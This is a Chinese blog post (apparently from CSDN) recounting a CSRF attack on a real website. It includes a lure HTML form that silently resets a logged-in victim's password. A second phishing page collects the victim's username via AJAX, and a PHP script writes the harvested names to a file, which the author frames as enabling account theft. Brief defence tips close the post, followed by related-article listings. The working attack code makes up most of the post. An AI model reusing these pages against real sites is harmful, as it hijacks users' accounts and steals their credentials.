真实环境的一次CSRF测试

最新推荐文章于 2024-06-03 13:48:38 发布
最新推荐文章于 2024-06-03 13:48:38 发布
阅读量885 收藏 7
点赞数 2
分类专栏: web安全 文章标签: CSRF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaopan233/article/details/88854273
版权

CSRF能够成功的关键就是利用受害者在指定网站中的Session或者Cookie。因为在同一个浏览器中。Session是通用的。如果我们的页面向指定网站发送请求。使用的就是受害者在该网站中的Session或Cookie。从而达到伪造用户请求的攻击。

借用百度一张图

 

回归正题

在个人设置中。如果发现修改密码的时候不用输入原密码。这种样子很不安全。因为我们只需要构造一个页面,诱使用户访问。访问后直接发送给网站后端这些数据即可。

如果要输入原密码的话。就需要让用户来自己填入原密码。这样我们要多构造一个页面让用户自己填入自己的原密码。这样子不如上一个方法隐蔽性高。

拿到页面第一步。先F12查看数据包格式。我们修改一下密码。看看发出去的数据包是什么样的。

可以看到他发送了六个字段。而且还是明文发送的。这样子就又省了事。知道发送的数据包后和后端地址URL后。我们就可以开始构造页面了。

简单的写了一个html。内容可以是很诱惑的东西。。。。为的是吸引受害者点击。

<!DOCTYPE html>
<html>
<head>
	<title></title>
	<meta charset="utf-8">
</head>
<body>
<form method="post" action="http://xxx.php?op=info">
	<input type="hidden" name="c_number">
	<input type="hidden" name="c_number">
	<input type="hidden" name="u_phone">
	<input type="hidden" name="u_qq">
	<input type="hidden" name="u_email">
	<input type="hidden" name="usersave">
	<input type="hidden" name="u_password" value="654321" />
	<input type="submit" name="" value="点我下载****">
</form>
</body>
</html>

 

我现在登陆着该网站。然后访问这个恶意的页面。点击按钮

额。。。弹了个窗。。。确定之后就跳转过去了。

测试密码也确实修改成功了。如果把用户名发过去,若后端能处理的话我们就能成功盗号了。

然鹅

但是这个站他好像不能改用户名。。。。只能改密码。

用户名还是55555。。。

所以在这个环境中限于水平也只能改改密码做恶作剧了。。。不过如果实在想盗号的话。可以在钓鱼页面加多一个文本框让他自己输入。我们保存一下他输入的用户名即可。

 

假页面代码:

<!DOCTYPE html>
<html>
<head>
	<title></title>
	<meta charset="utf-8">
</head>
<body>
<form method="post" action="http://xxxx/user.php?op=inf" name="form">
	<label>您在xx网站的用户名是:</label>
	<input type="text" name="c_number">

	<input type="hidden" name="u_phone">
	<input type="hidden" name="u_qq">
	<input type="hidden" name="u_email">
	<input type="hidden" name="usersave">
	<p>
	<label>同意xxx协议</label><input type="radio" id="radio">
	</p>
	<input type="hidden" name="u_password" value="654321" />
	<input type="submit" name="" value="点我下载****">
</form>
</body>
</html>
<script type="text/javascript">
	document.getElementById('radio').onclick = function(){
	//发送ajax
	if (window.XMLHttpRequest)
	{
		var xmlhttp;
	    xmlhttp=new XMLHttpRequest();
	    xmlhttp.open("GET","csrfTest.php?userName="+document.form.c_number.value,true);
		xmlhttp.send();
	}
}
</script>

处理ajax发来的用户名后端代码:

<?php
$userName = $_GET['userName'];
//FILE_APPEND 是以追加的方式写入文件
file_put_contents('./csrfTest.txt',$userName."\r\n",FILE_APPEND);
?>

 

假页面:

当我输入了这个网站的用户名。点击“同意xxx协议的单选框”时。触发onclick事件发送ajax请求给后端。保存用户名。

之后点击“点我下载****”

就重新跳到了原网站中。(这个是这个网站后端的问题。。。没法控制

这时候查看我们的txt文件。就能发现受害者的用户名。即可成功盗号了。

 

对于这种csrf的攻击防御方式的建议:

  1. 加入输入原密码。这样子在不知道原密码的情况是无法修改的
  2. 加入验证码。这样子能很好遏制CSRF的攻击
  3. 使用Referer来判断发送源。如果不是自己本服务器的源就拒绝
  4. 加入表单token。token必须是随机的
xiaopan233
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
使用 CSRFTester 进行自动化探测 CSRF 漏洞
Cwillchris的博客
07-12 1522
1、探测的目的探测的目的是:探测 web 应用程序是否具有防止 CSRF 的措施。如果 Web 应用程序的 HTTP 请求中没有对应的预防措施,那么很大程度上就确定存在 CSRF 漏洞2、自动化探测工具介绍实验环境:win7 虚拟机中步骤如下(1)启动 CSRFTester需要安装 JDK8,这个 JDK8 在前面安装 burpsuite 已经安装了。这里就不用安装了。(2)火狐浏览器设置代理(3)火狐访问DVWA,并登录,选择XSS(Store)(4)随便输入数据开启CSRF-Tester纪录切换到浏览器
CSRFTester-1.0
07-22
CSRFTester-1.0
安全测试 之 安全漏洞 CSRF
最新发布
Orange_hhh的博客
06-03 570
CSRF(Cross-Site Request Forgery),中文名为“跨站请求伪造”,是一种网络攻击方式,它利用用户已经登录的Web应用程序,通过伪造一个请求,执行非用户意愿的操作。这种攻击通常发生在用户已经登录网站A的情况下,攻击者通过网站B构造一个精心设计的链接或表单,诱使用户点击或提交,从而在用户不知情的情况下,利用其在网站A的登录凭证执行操作,比如转账、更改密码等。
CSRF跨站请求伪造,含使用教程和测试工具
05-04
CSRF跨站请求伪造,使用OWASP CSRFTester工具可以抓取并伪造请求,其测试原理是,使用代理抓取我们在浏览器中访问过的所有的连接以及所有的表单等信息,通过在CSRFTester中修改相应的表单等信息,重新提交,相当于一次伪造客户端请求,如果修改测试的请求成功被网站服务器接受,则说明存在CSRF漏洞。
安全测试CSRF 跨站点请求伪造
Testerhomee的博客
03-28 4676
原文由发表于TesterHome社区,点击原文链接可与作者直接交流。 ▌CSRF 攻击 CSRF 跨站点请求伪造 (Cross—Site Request Forgery):大概可以理解为攻击者盗用了你的身份,以你的名义在恶意网站发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作,比如以你的名义发送邮件、发消息,盗取你的账号,甚至于购买商品、转账等。 例如:Web A 为存在 CSRF 漏洞的网站,Web B 为攻击者构建的恶意网站,User C 为 Web A 网站的合法.
CSRF demo代码
02-04
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的...如果你打算使用或分析这个代码,确保在安全的环境中进行,以防止对真实系统造成潜在风险。同时,时刻保持代码库和依赖的更新,以利用最新的安全特性。
代码审计-企业级Web代码安全架构-247页.zip
10-08
随着DevOps理念的普及,书中也讨论了如何将代码审计融入到持续集成/持续部署(CI/CD)流程中,实现自动化审计,以确保每一次代码变更都不会引入新的安全风险。 七、合规性和标准 书中还会涉及一些行业标准和最佳...
靶机-淡然qqyw图标点亮系统
05-09
3. **日志记录**:为了方便分析和学习,系统可能记录每一次攻击的详细过程,包括请求参数、响应信息等,帮助用户理解攻击是如何发生的。 4. **安全性设置**:靶机通常会有安全设定,以防止攻击反噬到真实的网络环境...
Mob4
03-15
在JavaScript环境中,开发者可能需要使用Visual Studio Code、WebStorm等IDE进行编码,使用Git进行版本控制,使用模拟器或真实设备进行测试,最后通过App Store或Google Play进行应用发布。 6. **性能优化**:尽管...
cordovaPenjualan
05-02
开发者只需编写一次代码,就可以在多种操作系统上运行,极大地提高了开发效率。 2. **Web技术基础**:Cordova应用的基础是HTML、CSS和JavaScript。HTML用于创建用户界面,CSS负责样式设计,JavaScript则处理交互...
CSRF检测工具
12-09
CSRFTester是一款CSRF检测工具 .
跨站点请求伪造.zip
05-28
压缩包内分为笔记部分和环境搭建部分: 笔记部分:CSRF介绍、Cookie机制、检测CSRF漏洞存在、CSRF防御 环境搭建部分:bank文件夹中存放笔记中网站搭建源码、构造的get、post页面源码。 解压密码:456.com
手工检测网站漏洞 笔记
11-12
我们经常用啊D,挖掘机,之类的软件来探测网站存在的漏洞。但我们只会使用工具。对检测这些工具网站漏洞的原理确不是很清楚。这是一个手工检测网站存在漏洞的教程相信看过这个教程之后我们就会恍然大悟,原来手工检测这么检测啊!
跨站请求伪造-CSRF防护方法
03-12
跨站请求伪造-CSRF防护方法跨站请求伪造-CSRF防护方法
渗透测试基础知识普及之CSRF
Zhongdongding的博客
04-21 674
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的Web攻击方式,攻击者通过伪造用户的请求,来执行一些非法操作,例如修改账户信息、发表评论、转账等。在进行安全渗透测试时,测试人员需要对应用程序进行CSRF测试,以发现和修复潜在的漏洞。测试人员可以使用Burp Suite等工具,来修改请求头中的CSRF Token,以绕过防御机制。同时,也需要定期进行安全渗透测试,以发现和修复潜在的漏洞。总之,进行CSRF测试需要测试人员具备一定的技能和经验,以发现和修复潜在的漏洞。
FastAPI从入门到实战(8)——一文弄懂Cookie、Session、Token与JWT
欢迎自九陌而来的你做客九陌斋!
11-28 2258
看到标题应该也能看出来本文讲的就是前端鉴权相关的内容了,鉴权也就是身份认证,指验证用户是否有系统的访问权限,只要是web开发,这部分内容就是不可能不学的,很多面试也必问,所以本文就针对此主题详细记录一下其常见的几种方式。
CSRF手工测试方法
JackLiu16的博客
03-05 3650
导读关键词:token、referer和验证码CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。一般来说,CSRF是除XSS外最常见一种漏洞,也是一大刷分利器。 有关CSRF的具体利用,CEO早在 08年就给我们详细介绍了,大家可以去膜拜下: 文章链...
csrf一句话payload
04-21
CSRF(Cross-Site Request Forgery)是一种网络攻击方式,攻击者通过伪造用户的请求,使用户在不知情的情况下执行恶意操作。而一句话payload是指一段恶意代码,可以通过执行一句命令或者脚本来实现攻击目的。这两者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值